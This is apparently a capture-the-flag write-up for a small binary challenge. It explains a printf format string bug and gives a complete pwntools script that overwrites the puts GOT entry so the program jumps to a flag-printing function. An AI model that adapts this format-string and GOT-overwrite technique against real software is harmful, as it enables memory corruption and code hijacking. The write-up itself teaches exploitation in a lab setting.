Description
Exploit the service to get the flag.
Files
Enumeration
checksec shows that THERE ARE NO MITIGATION AT ALL.

When you run the program, it repeats what you typed.

Static Analysis
With Binary Ninja we can check out where it reads and prints our input.
We can see that printf doens’t have any strings before it gives input. This is vulnerable to string format vulnerability.

Also, there is handy function where it “cat flag.txt”

Solution
Since it is Partial RELRO and has No PIE, we can just override puts.got with flaggy address.
#/usr/bin/python2.7 from pwn import * isLocal = True if isLocal: p = process("./nra") else: p = remote("95.216.233.106", 25480) elf = ELF("./nra") GOT_PUTS = elf.got['puts'] FUNC_FLAGGY = elf.sym['flaggy'] p.recvline() print(hex(FUNC_FLAGGY)) #0x08049245 p.sendline(p32(GOT_PUTS + 2) + "@@@@" + p32(GOT_PUTS) + "%.8x%.8x%.2024x%hn%.35393x%hn") p.readline() p.readline() print(p.readline())